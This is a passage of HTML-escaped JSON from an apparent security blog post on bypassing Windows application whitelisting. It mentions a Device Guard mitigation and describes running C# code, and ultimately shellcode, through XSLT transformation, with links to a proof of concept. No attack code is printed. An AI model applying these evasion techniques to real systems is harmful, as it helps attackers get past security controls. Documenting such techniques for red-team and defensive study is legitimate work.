10\u003C\u002Fp>\u003Cp>\u003Cstrong>Defense:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Matt Graeber shared his mitigation approach, updating Device Guard Bypass MitigationRules, at the following addresses:\u003C\u002Fp>\u003Cp>https:\u002F\u002Ftwitter.com\u002Fmattifestation\u002Fstatus\u002F781211230065332224\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fmattifestation\u002FDeviceGuardBypassMitigationRules\u002F\u003C\u002Fp>\u003Ch2>0x03 execute C# from XSLT file\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>\u003Cstrong>Reference:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Ftwitter.com\u002FsubTee\u002Fstatus\u002F796737674954608641\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018822122_6_7c87d39df1-1.png\">\u003C\u002Fp>\u003Cp>\u003Cstrong>POC address:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgist.github.com\u002FsubTee\u002Fc34d0499e232c1501ff9f0a8dd302cbd#file-script-ps1\u003C\u002Fp>\u003Cp>\u003Cstrong>Introduction:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Casey shared an interesting technique on Twitter about executing C# code during XSLT file transformation. This section will share insights on this technique, expand the POC, and combine it with previous code to achieve shellcode execution via XSLT files.\u003C\u002Fp>\u003Cp>\u003Cstrong>XSLT:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>XSLT stands for Extensible Stylesheet Language Transformation.\u003C\u002Fp>\u003Cp>It is used to convert XML documents into one of the following formats:\u003C\u002Fp>\u003Cul>\u003Cli>HTML\u003C\u002Fli>\u003Cli>XML\u003C\u002Fli>\u003Cli>XHTML\u003C\u002Fli>\u003Cli>XSLT\u003C\u002Fli>\u003Cli>Text\u003C\u002Fli>\u003C\u002Ful>\u003Cp>During the transformation process, C# or VB code can be executed, similar to executing code during compilation in Visual Studio Persistence.\u003C\u002Fp>\u003Cp>XSLT is commonly used in web front-end development.\u003C\u002Fp>\u003Cp>\u003Cstrong>Actual testing:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Place the three files calc.xslt, example.xml, and script.ps1 in the same directory, and set the path variable $path in script.ps1\u003C\u002Fp>\u003Cp>Execute script.ps1 to generate output.xml and launch the calculator, as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018826948_7_f4b8d0665a-1.png\">\u003C\u002Fp>\u003Cp>For more tips on writing XSLT, refer to the following link:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fmsdn.microsoft.com\u002Fen-us\u002Flibrary\u002Fwxaw5z5e(v=vs.110).aspx\u003C\u002Fp>\u003Cp>Based on previous research, we have implemented calling C# to execute shellcode via XSLT. The address is as follows:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Mainly modified the calc.xslt file\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",1489,"Onedaysec",5,"published","2026-02-02T08:06:59.473Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Bypass App Whitelisting: Load DLL via Tracker.exe & CSI.exe","tracker.exe, csi.exe, bypass application whitelisting, load DLL, Windows Device Guard, C# XSLT execution, red team techniques",null,false,[],{"docs":43,"hasNextPage":40},[44,45,46,4],260,259,258,{"title":39,"description":39,"image":39},"2026-07-24T15:37:14.556Z","2026-07-23T16:01:16.921Z","draft","2026-07-23T16:04:52.207Z","2026-07-23T16:04:52.206Z"]